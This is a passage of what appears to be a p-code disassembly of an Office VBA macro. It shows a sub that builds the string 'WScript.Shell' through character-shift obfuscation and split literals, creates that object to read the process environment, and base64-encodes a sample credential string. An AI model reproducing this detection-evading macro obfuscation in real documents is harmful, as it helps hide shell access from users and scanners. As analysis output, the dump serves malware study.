' 	LitStr 0x0006 "xxyyzz"
' 	ArgsLd jsonaddfield 0x0002 
' 	LitStr 0x0001 ","
' 	Add 
' 	LitStr 0x0004 "tags"
' 	LitStr 0x0004 "noun"
' 	ArgsLd jsonaddarray 0x0002 
' 	Add 
' 	ArgsLd jsonouterwrap 0x0001 
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' Line #118:
' 	EndSub 
' Line #119:
' 	FuncDefn (Sub testb64())
' Line #120:
' 	Ld RequestAccept10 
' 	ArgsLd Asc 0x0001 
' 	LitDI2 0x0016 
' 	Add 
' 	ArgsLd Chr 0x0001 
' 	St RequestAccept11 
' Line #121:
' Line #122:
' 	Ld RequestAccept10 
' 	ArgsLd Asc 0x0001 
' 	LitDI2 0x0021 
' 	Sub 
' 	ArgsLd Chr 0x0001 
' 	St RequestAccept12 
' Line #123:
' 	SetStmt 
' 	LitStr 0x0002 "Pr"
' 	Ld RequestAccept10 
' 	ArgsLd LCase 0x0001 
' 	Add 
' 	LitStr 0x0001 "c"
' 	Add 
' 	Ld RequestAccept11 
' 	Add 
' 	LitStr 0x0002 "ss"
' 	Add 
' 	LitStr 0x0001 "w"
' 	ArgsLd UCase 0x0001 
' 	LitStr 0x0001 "s"
' 	ArgsLd UCase 0x0001 
' 	Add 
' 	LitStr 0x0005 "cript"
' 	Add 
' 	Ld RequestAccept12 
' 	Add 
' 	LitStr 0x0002 "Sh"
' 	Add 
' 	LitStr 0x0000 ""
' 	Add 
' 	Ld RequestAccept11 
' 	Add 
' 	LitStr 0x0002 "ll"
' 	Add 
' 	ArgsLd CreateObject 0x0001 
' 	ArgsMemLd Environment 0x0001 
' 	Set RequestAccept3 
' Line #124:
' 	ExitSub 
' Line #125:
' 	LitStr 0x000B "user:mypass"
' 	ArgsLd Base64Encode 0x0001 
' 	Paren 
' 	ArgsCall MsgBox 0x0001 
' Line #126:
' 	EndSub 
' Line #127:
' 	FuncDefn (Function Base64Encode(sText))
' Line #128:
' 	Dim 
' 	VarDefn oXML
' 	VarDefn oNode
' Line #129:
' 	SetStmt 
' 	LitStr 0x0016 "Msxml2.DOMDocument.3.0"
' 	ArgsLd CreateObject 0x0001 
' 	Set oXML 
' Line #130:
' 	SetStmt 
' 	LitStr 0x0006 "base64"
' 	Ld oXML 
…